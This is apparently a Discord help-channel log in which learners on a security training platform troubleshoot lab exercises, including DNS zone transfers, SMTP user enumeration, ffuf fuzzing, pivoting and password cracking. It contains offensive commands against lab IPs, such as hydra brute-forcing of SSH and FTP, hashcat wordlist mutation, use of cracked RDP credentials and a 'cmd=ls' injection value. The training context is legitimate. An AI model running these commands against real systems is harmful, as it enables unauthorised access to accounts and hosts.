good morning everyone.. on active subdomain enumeration, zonetransfers section. im not sure what im doing wrong on nslookup. the command "nslookup -type=NS inlanefreight.htb" doesnt work, so i try interactive mode and set the server to my target IP 10.129.128.170 and then try looking for the NS record through interactive mode which still doesnt give me results, says REFUSED. however if I do "dig ns inlanefreight.htb @10.129.128.170" that does give me the record. Is my nslookup broken or am I missing something with that tool?

thats specifying a custom DNS server

You must also specify a name server with nslookup, as .htb is not an official TLD.

well the first objective is to find the name server

i know it but i want to complete this lab with nslookup not dig

What is the question

Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.

Is there an **actual **working **attack ****box **solution to mounting the .VHD for the password attack lab hard? Doesn't appear so

i have to specify otherwise it tries to use my gateway by default

Then the goal is not to find the name server, but the FQDN of the name server

and using 1.1.1.1 as my server doesnt work either

Right, because .htb is not an official TLD

seems i over thought that

when run nmap on the target IP i do see port 53 open

You can also mount a vhd in Linux, but it is not as easy as in Windows

perhaps theres a script i can run to grab the FQDN?

I cannot seem to get it to work using guestmount and looking at the chat history it appears most give up and just transfer it to their Windows Host.

.

The target is the name server. Yes, port 53 TCP and UDP is probably open 😉

Use dig or nslookup

Enter key or passphrase ("/dev/sda2"):  
guestmount: no operating system was found on this disk

If using guestfish ‘-i’ option, remove this option and instead
use the commands ‘run’ followed by ‘list-filesystems’.
You can then mount filesystems you want by hand using the
‘mount’ or ‘mount-ro’ command.

If using guestmount ‘-i’, remove this option and choose the
filesystem(s) you want to see by manually adding ‘-m’ option(s).
Use ‘virt-filesystems’ to see what filesystems are available.

If using other virt tools, this disk image won’t work
with these tools.  Use the guestfish equivalent commands
(see the virt tool manual page).
┌─[✗]─[htb]─[~]
└──╼ $ls -l /media/mnt

Found it in resources

Guys has anyone done the NTLM Relay Attacks Module?
I'm stuck on the Skill Assessment, can anyone give me hints?

moving past that now.. for the actual zone transfer i get "transfer failed" with dig. "dig axfr ns.inlanefreight.htb @10.129.128.1270"

https://www.linuxuprising.com/2019/04/how-to-mount-bitlocker-encrypted.html

https://medium.com/@kartik.sharma522/mounting-bit-locker-encrypted-vhd-files-in-linux-4b3f543251f0

i prefer the medium article as it's much simpler to follow along almost completely without thinking

Thanks!

check the ip (last octet)
You can configure a zone so that only certain servers are allowed to perform a zonetransfer

└──╼ [★]$ xfreerdp -cert-ignore /v:10.129.153.218 /u:john /p:november
[17:55:13:768] [7506:7507] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:55:13:768] [7506:7507] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 104: Connection reset by peer
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[17:55:14:047] [7506:7507] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Getting connection reset when trying to rdp```
https://academy.hackthebox.com/module/147/section/1327

wrap the error in triple backticks ```

so it will look like this

Done.

Doing it from the pwnbox

well you cracked it for winrm first off; are you sure that user has rdp privs?

used hydra with the rdp:// so I doubt that its going to be the same as winrm

read the question :)

hydra showed it as a valid password

but what is the QUESTION asking

:)

for the rdp protocol, not sure about the user having privileges for that since i don't have access to the remote server yet

...Then you're not looking at the right user

each user for each question is different

something you CAN do to limit your username list down is to go to C:\Users

Found it, console was cropped so didn't see the entire privileges

Ohh , that means that 8.8.8.8 wont work

Well also windows 10 supportsVHDX

No public DNS resolver will work.
.htb is not an official TLD

The Windows OS is natively able to mount a VHD- or VHDX-based virtual hard drive file in the same way that any other type of removable media can be mounted and accessed by the operating system.

Ohh okay, that is noted

hi

im new to HTB and was wandering how to get unlost

many people are new to HTB

this isn't a general chat

you can read #welcome on how to access more of the server :)

if you have a question regarding an academy module feel free to ask though

thank you

Hey im on the Pivoting Module and cant figure out what i am missing on the webserver pivoting with rpivot.
My "proxychains firefox-esr" times out...

Those are my rpivot shells

wtf why this works

can i dm you really quick?

nvm i got a whitespace in my clipboard which htb didnt recognize

yea

i think firefox didnt work since it tried to do outbound connections which timed out since its a internal network

I need a hand for what seems a rather simple affair in the Footprinting module, SMTP chapter, last question. I need to enumerate users so I tested with nmap's script, smtp-user-enum, tested the different commands with each but none one of them gives me the answer.
nmap just shows every single name from the list as valid and smtp-user-enum shows none as valid.

use the actual smtp-user-enum tool, not the nmap script

yeah I used that

i forget if you need to append a domain or not

i always forget that part

if I test vrfy root I get something where I got nothing for AAAA so it seems you do not.

I have not

I let it run until it's done. They give you a small list of names to test

yeah

if you add a domain then it seems to always succeed with VRFY

that's what it is

:)

I mean, it succeeds but it's not right

there's only one user

should be

but yeah adding the domain makes it false positive for whatever reason

Anyone working on Intro to Assembly? I have the correct answer to an exercise, like 100% correct, and I cannot figure out why HTB wont take the answer in literally any format I put in. I am about done with the module, but won't be able to complete it until I can get this one page completed lol

OH MY GOD I GOT IT. Nevermind

how long could It take to complete the pentest job path

avg

a few months to a year depending on experience

increasing the wait time on the command might help

I got it with metasploit then I made tests with smtp-user-enum knowing which one is the right one and I am getting the right answer randomly, even with the same parameters. Using different methods, wait times and thread count

wait time >= 15

I get it randomly at 10

Hey folks working on the skills assessment for secure coding. I think I'm gonna need JSNice for at least renaming* the local variables, but this is the output I recieve.

seems like 15 sec wait time and 10 threads worked

SMTP is a slow service is why

hello everyone, i'm having some issues with the first part of the skill assessment for Game Reversing & Modding "Fixman", which is patching the fact that i cant press space to launch the game, i'm using DnSpy and i modified CheckStart(), Start() and Update() methods, can someone give me some help ? thanks

Hi guys, I have an issue with the Linux Fundamental module's File Descriptors and Rederictions section.

Question: How many files on the system have the ".log" file extension?
The command I used: locate *.log
My answer: 24 (WHICH IS INCORRECT)

locate is obviously the wrong command. 😉

😉😉

Please, tell me if it's possible answer at the question or we can only suggest

I tried this command too find / -type f -name "*.log"

| wc -l

What is the logic behind this?

anyone can help me with command injection - skills assessments?

Is it for error redirection?

That's not error redirect , it's output redirect

At the end of your command add | wc -l which counts the output lines

Thanks @fathom pendant .

Sorry, I struck with this section of file descriptors and redescriptors. I am unable to wrap my head around it, honestly!
I tried youtube to learn this section but nothing helped much.

?

any ideas on this here. I don't know if many people have completed this module yet

it's totally normal you just need to read the section carefully couple times , and you will understand how to solve the challenge , and remember google is your friend

Anybody knows whats up here? Im trying to DNS tunnel and this error is not explained in the sections so far

anyone can help me with command injection - skills assessments?

Hi all, I'm working on the Web Fuzzing skills assessment module, and I've been stuck on this question for a few hours now.

Q: "In the page from the previous question, you should be able to find multiple parameters that are accepted by the page. What are they?"

I tried running the ffuf command with the burp text file, targeting the first param (FUZZ=key) and I get something back (for the sake of not spoiling for others). Since I'm expecting another param I then tried FUZZ=key&FUZZ2=key, but didn't get anything back.

Lastly, I tried param fuzzing on other pages, but haven't found anything of significance so I'm truly lost at this point. Any ideas of what I could be missing?

takes the output of the last command as the input of the new command 😉

where are you stuck?

Guys, I have got another question I am stuck with in the same module: Linux Fundamentals and section: File Descriptors and Redirectors.

Question: How many total packages are installed on the target system
Commands I have used: dpkg -l | wc -l and dpkg --get-selections | wc -l

And to my surprise both of these commands give a different answer: 748 and 743 respectively, and none of them is correct.

because not all are installed

And both the answers are incorrect 😢

you’re using a wrong payload

take your command a step back to see what you missed😉

I am in ATTACKING WEB APPLICATIONS WITH FFUF -> Sub-domain Fuzzing

I think isn't hard to resolve, but when I tried to exec a command

ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://FUZZ.inlanefreight.com/

I receive

:: Progress: [4997/4997] :: Job [1/1] :: 341 req/sec :: Duration: [0:00:27] :: Errors: 4997 ::

Let me give it another shot and get back to you, if it works.

can i dm?

the fuzz keyword might be case sensitive idk

@south folio Did you add http://fuzz.inlanefreight.com/ to you /etc/hosts/ file?

yes

and should be .htb or .local idk

cat /etc/hosts

134.209.24.248 inlanefreight.com

I am write correct with case sensitive, but Discor have convert to lower the FUZZ word

Is your target ip still valid?

If I put the url in the browser I can navigate on web site. But he ping command it's trapped

@south folio

I have received from ping command

Hi @lusty thicket , I had no luck figuring out the right command or what I missed. Can you help me to figure it out?

ping inlanefreight.com
PING inlanefreight.com (134.209.24.248) 56(84) bytes of data.

Trying using the -H command, that shouldn't make a difference, but it's worth a try

inlanefreight.com is a real site that they setup for certain modules, so make sure the module youre on actually uses that one

cause 90% of the time its inlanefreight.htb or inlanefreight.local

Why should he do that?

ping inlanefreight.htb
ping: inlanefreight.htb: Name or service not known

yes you would have to add it to/etc/hosts if the module doesnt use the .com one

No I need to scan for sub-domain and I need to have a valid url. This is not present in the LAN

which module and section are you doing

@acoustic owl Because if it's not found in the DNS, then it will defer to /etc/hosts and try to match an IP from there

hes passed the exam, he knows how etc hosts work. You dont need to add a .com to etc hosts

thats what he was pointing out

Oh, okay

ATTACKING WEB APPLICATIONS WITH FFUF -> Sub-domain Fuzzing

Try running a sub-domain fuzzing test on 'inlanefreight.com' to find a customer sub-domain portal. What is the full domain of it?

Module: Attack Web Apps Section:Exploiting Web Vulnerabilities in Thick-Client Applications -- actually modified the invoker.java file as follows:```import java.io.FileOutputStream;
<SNIP>
public String open(String foldername, String filename) throws MessageParseException, MessageBuildException, IOException {
String methodName = (new Object() {}).getClass().getEnclosingMethod().getName();
logger.logInfo("[+] Method '" + methodName + "' was called by user '" + this.user.getUsername() + "'.");
if (AccessCheck.checkAccess(methodName, this.user)) {
return "Error: Method '" + methodName + "' is not allowed for this user account";
}
this.action = new ActionMessage(this.sessionID, "open");
this.action.addArgument(foldername);
this.action.addArgument(filename);
sendAndRecv();
String desktopPath = System.getProperty("user.home") + "\Desktop\fatty-server.jar";
FileOutputStream fos = new FileOutputStream(desktopPath);

if (this.response.hasError()) {
    return "Error: Your action caused an error on the application server!";
}

byte[] content = this.response.getContent();
fos.write(content);
fos.close();

return "Successfully saved the file to " + desktopPath;

}
<SNIP>^```` -- but now i get error: Failed to open file '/opt/fatty/files/..s/files' when running app ------- any hints?

No, first the hosts file is queried, then the DNS resolver.
However, the hosts file does not contain a protocol such as http://.
inlanefreight**.com** is a publicly accessible site. The domain is correctly resolved by the DNS resolver.

okay good, that's one of the rare ones that uses .com so ignore /etc/hosts recommendations

@acoustic owl I see, and that makes sense. Thanks for clearing that up

have you got it now?

The Password Attacks module states the following:
"Single Crack Mode is one of the most common John modes used when attempting to crack passwords using a single password list. It is a brute-force attack, meaning all passwords on the list are tried, one by one, until the correct one is found."

Would this not be a dictionary attack?
I also found the following over on StackExchange: https://security.stackexchange.com/a/37074

theyre interchangeable in this context

If we modify the /etc/hosts with Ip and names, theoretically we don't have the problem
I cat also write in the /etc/hosts

134.209.24.248 inlanefreight inlanefreight.com
and I can use both the name

you dont need to do this

Ok but the ffuf don't work

🫣

Not in mine

works for me

you’re obviously doing something wrong

@south folio I checked, your ffuf is against the http service

although it works for me on either

What the content of your /etc/hosts?
Because I need only the Ip Address of inlanefreight.com, and if it's incorrect cannot works.

Nothing. I told you to ignore that part

delete inlanefreight.com from your hosts file

that’s a public domain man

if you have any entries remove them

*any non default entries

https://www.nslookup.io/domains/inlanefreight.com/dns-records/

Now is clean:

Your system has configured 'manage_etc_hosts' as True.

As a result, if you wish for changes to this file to persist

then you will need to either

a.) make changes to the master file in /etc/cloud/templates/hosts.debian.tmpl

b.) change or remove the value of 'manage_etc_hosts' in

/etc/cloud/cloud.cfg or cloud-config from user-data

127.0.1.1 upcloud-capture-droplet upcloud-capture-droplet
127.0.0.1 localhost

The following lines are desirable for IPv6 capable hosts

::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

127.0.0.1 localhost
127.0.1.1 htb-un7abfxl8f htb-un7abfxl8f.htb-cloud.com

Uhm

Discord convert a pund caracter

pound

Yes I can ping also from my Pc and the Whois show me same Ip address: 134.209.24.248

ping inlanefreight.com
PING inlanefreight.com (134.209.24.248) 56(84) bytes of data.

Could I get some help with the IMAP/POP3 host based enumerations?

Getting stuck where it asks for the admin email address

When connecting to openssl s_client -connect [IP address]:pop3s
I can type USER Admin and I get a "+OK" response meaning its an available email account on the server

wherpwpwd

tyring to login with the credentils robin:robin but I might be able to figure this out

that’s what you’re supposed to do

I kept on getting this error

No idea what I'm missing here

you should enter a command tag before the actual command

command tags.. 1 a

..

This worked! thank you for you assistance

My brain did not process the ones above where they clearly show the command tags

guys can t found found which version of poolkit are venurable too local pe

pkexec is present from 2009 till 2021

but i want to know all the version that are affected any idea

I'm doing the Session Security module, and the Attack Box is not on the page at all? Or in any other page?

It's not that it's not spawning, it's literally not there.

hi guys ive been stuck on this for a couple of days does any know why im not able to run this module> intro to brute force > username brute force

as it says you need to use a valid password file

File not found, yet locate says it exists

Is the issue

Try the /usr/share/ one

crying

wordlists* you missed an s

can someone help me with command injection skills assessments?

dontasktoask

<@&861185840277487616>

https://academy.hackthebox.com/module/147/section/1391

How long is it supposed to take to brute force the password for ssh

cheers.

You are given the password list and username

Aren't we supposed to use cewl to get the password list

Can't say as I haven't looked at the module in a while. Read what the module says. I know some modules that involve some sort of bruteforce/dict attack has a file that contains the username and password.

hint make a mutated version of the given wordlists (using the given rule) all from the Resources (hence the second name) and for the brute forcing time it will take a while but if you don't want to wait cut the first 17000 word of the list

Well trying password.list mutated mutatednow instead of cewl

Thank's, trying right now

still taking insanely long

try ftp, and give it more threads

may i know how you created the mutated? i did with custom rules and password.list i found on HTB resource - i get around 187xxxx combination

im doing the same thing - using ftp with 48 threads also i slipt the mutated list into sevral files still it takes times! any tips?

btw i used hashcat command in the cheatsheet

Did you use the provided password list and rules list from the zip file

yes

I wouldn't recommend splitting the mutated list up but that's personal preference

do you recommend doing this - ||cat mutated.list | sort | uniq > new_mutated.list||

If you used the command from the module it should already have sorted the unique passwords

That's what sort -u does

hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list

used the exact command

a hour later

hydra -l sam -P mut_password.list ssh://10.129.184.26
now using this to brute force the ssh

Just finished the AD module!! I'm not going to lie, I need to do it again soon. it was a steep learning curve for me and I feel I know nothing... did most of the Assessments using tips, asking for help....! want to say thanks to HTB team for their good work and this great community for being always helpful

introduction to whitebox or whitebox 101, which one should i get?

hydra -l sam -P mut_password.list ftp://10.129.184.26 -t 20```

If you're starting out, Intro to WB would be better imo.
WB 101: Command Injection recommends you to have completed Secure coding 101.

intro to WB it is then thanks

i cant afford secure coding with student sub

You can't get any of the WB with student sub either.

Cuz, all of them are T3

use -T 48 or higher

hydra -l sam -P mut_password.list ftp://10.129.184.26 -t 64

yes

Avoid using --force if possible 🙂

why? thats how it is suggested to do the mutation

--force is a command for developers and people working on the code base

it should NOT be used by users

it will bypass blocking warnings and could lead to very poor or unexpected behavior from hashcat

even to the degree of false positives/negatives

thats for creating a mutation wordlist tho

i mean, sure, but would you want to bypass blocking errors in your list creation?

what false positive are you fearing in that

the rule engine is still running similar to how it would during an attack

errors in that will mean errors in your output there as well

but again, poor behavior in general like crashes or memory problems are never good

even if it doesnt lead to worst case scenario

i use --force because god protects me from unintended behaviors

for the people who still struggling in mutation, use "||hashcat --force password.list -r custom.rule --stdout > mut_password.list||" then if the output is 187xxxx then use ||cat mutated.list | sort | uniq > new_mutated.list|| to reduce it into 94k then use hydra to crack ftp instead of ssh. use Higher Thread and verbose. i cracked it in an hour.

and i keep adding warnings specifically to that flag because of people using it 🙂

agreed

hm why is --force suggested to be used in the module then, should probably change it if it shouldn't be used

it's been an ongoing issue with like, every tutorial ever

you would not believe the amount of issues we get because of old tutorials suggesting stupid stuff like that

or using just outdated or generally poor advice

add in the fact that chatGPT knows exactly 0 anything about how to operate hashcat and you get a LOT of unhappy people in my DMs and in our discord server/forums/github issues

image asking chatgpt on how to use hashcat instead of rtfm

lol, and with all that documentation we have too

its not perfect but it's a hell of a lot more than most tools

my favourite literature is the hashcat examples page

it's also built into the tool as well 🙂

dynamically created and queried from the hashes present in each module for self testing during kernel init

oh dang didn't know that

I'll suggest a change to not use --force in #858470491676737536 then

i think it's been brought up before unfortunately

welp here we go again I guess

there was a hashcat module as well

though i haven't heard much about it recently

not sure if it finally got rewritten/pulled/etc.

it's still there.. is it also not good? 😅

it's not bad, it's just aging quickly

lots of stuff that was outdated almost immediately

like the WPA section

ah I see, I suppose that seems like a drive by mention, will definitely need something more in depth for WPA related things

yeah

I wonder if they'd let me update it/rewrite it 🤔

that would be pretty awesome to have the hashcat module penned by a dev

Thank's, will remember that.

hi guys. I'm on password attack module and trying to install crackmapexec. I've tried pipx install crackmapexec, docker pullbyt3bl33d3r/crackmapexec, sudo apt install crackmapexec. None of them works. Can anyone help ? Thanks in advance.🥹🥹🥹

and i'm already stuck on the first question. which user list should i use?

use netexec instead, it's same as cme but better https://www.netexec.wiki/getting-started/installation/installation-on-unix

Thank you

How long are passwords usually supposed to take to crack in a htb academy module

highest 5 mins

if its more than that then youre in a rabbit hole

Yeah, then I am in one

uh if you're in the password attack module it will take longer

I doubt its not 2 hours

does that apply to academy modules, isn't that for boxes

same with modules

password attack module would disagree with that

i havent found one that took more than 5 mins(idk if they updated the module lemme check)

nope they didnt

i download the resources provided, i think it's taking forever to brute force

Use a different list

Unless we're talking about brute-forcing and not cracking, then you definitely have some lengthy waits in the password attacks module

cmd=ls